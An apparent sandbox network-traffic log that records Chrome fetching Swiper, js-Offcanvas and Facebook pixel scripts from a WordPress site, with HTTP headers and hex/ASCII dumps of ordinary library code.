                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 139153
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 2f 2a 2a 0a 20 2a 20 53 77 69 70 65 72 20 35 2e 33 2e 36 0a 20 2a 20 4d 6f 73 74 20 6d 6f 64 65 72 6e 20 6d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 77 69 70 65 72 6a 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 32 30 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 6f 6e 3a 20 46 65 62 72 75 61 72 79 20 32 39 2c 20 32 30 32 30 0a 20 2a 2f 0a
                                                                                                          Data Ascii: /** * Swiper 5.3.6 * Most modern mobile touch slider and framework with hardware accelerated transitions * http://swiperjs.com * * Copyright 2014-2020 Vladimir Kharlampidi * * Released under the MIT License * * Released on: February 29, 2020 */
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 2e 77 69 64 74 68 3a 69 5b 30 5d 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 74 3d 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 70 61 72 61 6d 73 2e 68 65 69 67 68 74 3f 74 68 69 73 2e 70 61 72 61 6d 73 2e 68 65 69 67 68 74 3a 69 5b 30 5d 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 30 3d 3d 3d 65 26 26 74 68 69 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 28 29 7c 7c 30 3d 3d 3d 74 26 26 74 68 69 73 2e 69 73 56 65 72 74 69 63 61 6c 28 29 7c 7c 28 65 3d 65 2d 70 61 72 73 65 49 6e 74 28 69 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 6c 65 66 74 22 29 2c 31 30 29 2d 70 61 72 73 65 49 6e 74 28 69 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 2c 31 30 29 2c 74 3d 74 2d 70 61 72 73 65 49 6e 74 28 69 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 74 6f 70 22 29 2c
                                                                                                          Data Ascii: .width:i[0].clientWidth,t=void 0!==this.params.height?this.params.height:i[0].clientHeight,0===e&&this.isHorizontal()||0===t&&this.isVertical()||(e=e-parseInt(i.css("padding-left"),10)-parseInt(i.css("padding-right"),10),t=t-parseInt(i.css("padding-top"),
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 72 2e 6f 6e 53 6c 69 64 65 54 6f 57 72 61 70 70 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 29 29 29 2c 21 30 7d 2c 73 6c 69 64 65 54 6f 4c 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 2c 73 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 30 29 2c 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 70 65 65 64 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 21 30 29 3b 76 61 72 20 61 3d 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 61 6d 73 2e 6c 6f 6f 70 26 26 28 61 2b 3d 74 68 69 73 2e 6c 6f 6f 70 65 64 53 6c 69 64 65 73 29 2c 74 68 69 73 2e 73 6c 69 64 65 54 6f 28 61 2c 74 2c 69 2c 73 29 7d 2c 73 6c 69 64 65 4e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 76 6f 69 64 20 30 3d 3d 3d 65
                                                                                                          Data Ascii: r.onSlideToWrapperTransitionEnd))),!0},slideToLoop:function(e,t,i,s){void 0===e&&(e=0),void 0===t&&(t=this.params.speed),void 0===i&&(i=!0);var a=e;return this.params.loop&&(a+=this.loopedSlides),this.slideTo(a,t,i,s)},slideNext:function(e,t,i){void 0===e
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 6d 6f 6d 65 6e 74 75 6d 42 6f 75 6e 63 65 22 29 2c 74 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 28 73 2e 73 70 65 65 64 29 2c 74 2e 73 65 74 54 72 61 6e 73 6c 61 74 65 28 78 29 2c 6f 2e 74 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 26 26 21 74 2e 64 65 73 74 72 6f 79 65 64 26 26 74 2e 74 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 7d 29 29 29 7d 29 29 29 3a 74 2e 76 65 6c 6f 63 69 74 79 3f 28 74 2e 75 70 64 61 74 65 50 72 6f 67 72 65 73 73 28 79 29 2c 74 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 28 62 29 2c 74 2e 73 65 74 54 72 61 6e 73 6c 61 74 65 28 79 29 2c 74 2e 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 72 74 28 21 30 2c 74 2e 73 77 69 70 65 44 69 72 65 63 74 69 6f 6e 29 2c 74 2e 61 6e 69 6d 61 74 69 6e 67 7c 7c 28 74 2e
                                                                                                          Data Ascii: momentumBounce"),t.setTransition(s.speed),t.setTranslate(x),o.transitionEnd((function(){t&&!t.destroyed&&t.transitionEnd()})))}))):t.velocity?(t.updateProgress(y),t.setTransition(b),t.setTranslate(y),t.transitionStart(!0,t.swipeDirection),t.animating||(t.
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 6c 6c 29 2c 6e 2e 64 65 6c 65 74 65 50 72 6f 70 73 28 69 29 29 2c 69 2e 64 65 73 74 72 6f 79 65 64 3d 21 30 2c 6e 75 6c 6c 29 7d 2c 74 2e 65 78 74 65 6e 64 44 65 66 61 75 6c 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 65 78 74 65 6e 64 28 46 2c 65 29 7d 2c 69 2e 65 78 74 65 6e 64 65 64 44 65 66 61 75 6c 74 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 7d 2c 69 2e 64 65 66 61 75 6c 74 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 7d 2c 69 2e 43 6c 61 73 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 69 2e 24 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 74
                                                                                                          Data Ascii: ll),n.deleteProps(i)),i.destroyed=!0,null)},t.extendDefaults=function(e){n.extend(F,e)},i.extendedDefaults.get=function(){return F},i.defaults.get=function(){return V},i.Class.get=function(){return e},i.$.get=function(){return s},Object.defineProperties(t
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 73 28 61 29 2c 6e 3d 72 2e 69 6e 64 65 78 28 29 3b 6e 3d 3d 3d 69 26 26 72 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 29 2c 74 2e 64 79 6e 61 6d 69 63 42 75 6c 6c 65 74 73 26 26 28 6e 3e 3d 6f 26 26 6e 3c 3d 6c 26 26 72 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 2b 22 2d 6d 61 69 6e 22 29 2c 6e 3d 3d 3d 6f 26 26 72 2e 70 72 65 76 28 29 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 2b 22 2d 70 72 65 76 22 29 2e 70 72 65 76 28 29 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 2b 22 2d 70 72 65 76 2d 70 72 65 76 22 29 2c 6e 3d 3d 3d 6c 26 26 72 2e 6e 65 78 74 28 29 2e 61 64 64 43 6c 61 73 73
                                                                                                          Data Ascii: s(a),n=r.index();n===i&&r.addClass(t.bulletActiveClass),t.dynamicBullets&&(n>=o&&n<=l&&r.addClass(t.bulletActiveClass+"-main"),n===o&&r.prev().addClass(t.bulletActiveClass+"-prev").prev().addClass(t.bulletActiveClass+"-prev-prev"),n===l&&r.next().addClass
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 2c 20 22 2b 69 2e 63 75 72 72 65 6e 74 59 2b 22 70 78 2c 30 29 22 29 7d 7d 2c 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 7a 6f 6f 6d 2c 74 3d 65 2e 67 65 73 74 75 72 65 3b 74 2e 24 73 6c 69 64 65 45 6c 26 26 74 68 69 73 2e 70 72 65 76 69 6f 75 73 49 6e 64 65 78 21 3d 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 26 26 28 74 2e 24 69 6d 61 67 65 45 6c 2e 74 72 61 6e 73 66 6f 72 6d 28 22 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 20 73 63 61 6c 65 28 31 29 22 29 2c 74 2e 24 69 6d 61 67 65 57 72 61 70 45 6c 2e 74 72 61 6e 73 66 6f 72 6d 28 22 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 22 29 2c 65 2e 73 63 61 6c 65 3d 31 2c 65 2e 63 75 72 72 65 6e 74 53 63 61 6c
                                                                                                          Data Ascii: , "+i.currentY+"px,0)")}},onTransitionEnd:function(){var e=this.zoom,t=e.gesture;t.$slideEl&&this.previousIndex!==this.activeIndex&&(t.$imageEl.transform("translate3d(0,0,0) scale(1)"),t.$imageWrapEl.transform("translate3d(0,0,0)"),e.scale=1,e.currentScal
                                                                                                          2024-12-12 11:58:32 UTC16384INData Raw: 69 76 3e 27 29 2c 69 2e 61 70 70 65 6e 64 28 65 29 29 2c 65 2e 63 73 73 28 7b 68 65 69 67 68 74 3a 72 2b 22 70 78 22 7d 29 29 3a 30 3d 3d 3d 28 65 3d 74 2e 66 69 6e 64 28 22 2e 73 77 69 70 65 72 2d 63 75 62 65 2d 73 68 61 64 6f 77 22 29 29 2e 6c 65 6e 67 74 68 26 26 28 65 3d 73 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 69 70 65 72 2d 63 75 62 65 2d 73 68 61 64 6f 77 22 3e 3c 2f 64 69 76 3e 27 29 2c 74 2e 61 70 70 65 6e 64 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 75 3d 30 3b 75 3c 61 2e 6c 65 6e 67 74 68 3b 75 2b 3d 31 29 7b 76 61 72 20 76 3d 61 2e 65 71 28 75 29 2c 66 3d 75 3b 70 26 26 28 66 3d 70 61 72 73 65 49 6e 74 28 76 2e 61 74 74 72 28 22 64 61 74 61 2d 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6e 64 65 78 22 29 2c 31 30 29 29 3b 76 61 72 20
                                                                                                          Data Ascii: iv>'),i.append(e)),e.css({height:r+"px"})):0===(e=t.find(".swiper-cube-shadow")).length&&(e=s('<div class="swiper-cube-shadow"></div>'),t.append(e)));for(var u=0;u<a.length;u+=1){var v=a.eq(u),f=u;p&&(f=parseInt(v.attr("data-swiper-slide-index"),10));var
                                                                                                          2024-12-12 11:58:33 UTC8081INData Raw: 63 6f 6e 74 72 6f 6c 26 26 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 26 26 28 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 29 7d 2c 6f 62 73 65 72 76 65 72 55 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 63 6f 6e 74 72 6f 6c 26 26 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 26 26 28 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 29 7d 2c 73 65 74 54 72 61 6e 73 6c 61 74 65 3a 66 75 6e 63 74 69 6f 6e
                                                                                                          Data Ascii: control&&this.controller.spline&&(this.controller.spline=void 0,delete this.controller.spline)},observerUpdate:function(){this.controller.control&&this.controller.spline&&(this.controller.spline=void 0,delete this.controller.spline)},setTranslate:function


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          103192.168.2.2449895147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC747OUTGET /wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js?ver=1.2.9 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:32 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:32 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:49 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 15810
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:32 UTC15810INData Raw: 2f 2a 21 20 6a 73 2d 4f 66 66 63 61 6e 76 61 73 20 2d 20 76 31 2e 32 2e 31 31 20 2d 20 32 30 31 39 2d 31 30 2d 31 36 0a 6a 51 75 65 72 79 20 41 63 63 65 73 69 62 6c 65 20 4f 66 66 63 61 6e 76 61 73 20 50 61 6e 65 6c 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 76 6d 69 74 73 61 72 61 73 2f 6a 73 2d 6f 66 66 63 61 6e 76 61 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 39 20 56 61 73 69 6c 65 69 6f 73 20 4d 69 74 73 61 72 61 73 20 28 40 76 6d 69 74 73 61 72 61 73 29 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 75 74 69 6c 73 7c 7c 7b 7d 3b 62 2e 63 6c 61 73 73 65 73 3d 7b 68 69 64 64 65 6e 56 69 73
                                                                                                          Data Ascii: /*! js-Offcanvas - v1.2.11 - 2019-10-16jQuery Accesible Offcanvas Panels * https://github.com/vmitsaras/js-offcanvas * Copyright (c) 2019 Vasileios Mitsaras (@vmitsaras) * MIT License */!function(a){"use strict";var b=a.utils||{};b.classes={hiddenVis


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          104192.168.2.2449897157.240.196.154437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC543OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                          Host: connect.facebook.net
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:33 UTC1452INHTTP/1.1 200 OK
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                          timing-allow-origin: *
                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-DkDxIDEJ' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                          document-policy: force-load-at-top
                                                                                                          2024-12-12 11:58:33 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                          2024-12-12 11:58:33 UTC1INData Raw: 2f
                                                                                                          Data Ascii: /
                                                                                                          2024-12-12 11:58:33 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                          Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                          Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                          Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21
                                                                                                          Data Ascii: ),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!
                                                                                                          2024-12-12 11:58:33 UTC1703INData Raw: 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                          Data Ascii: ()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Obje
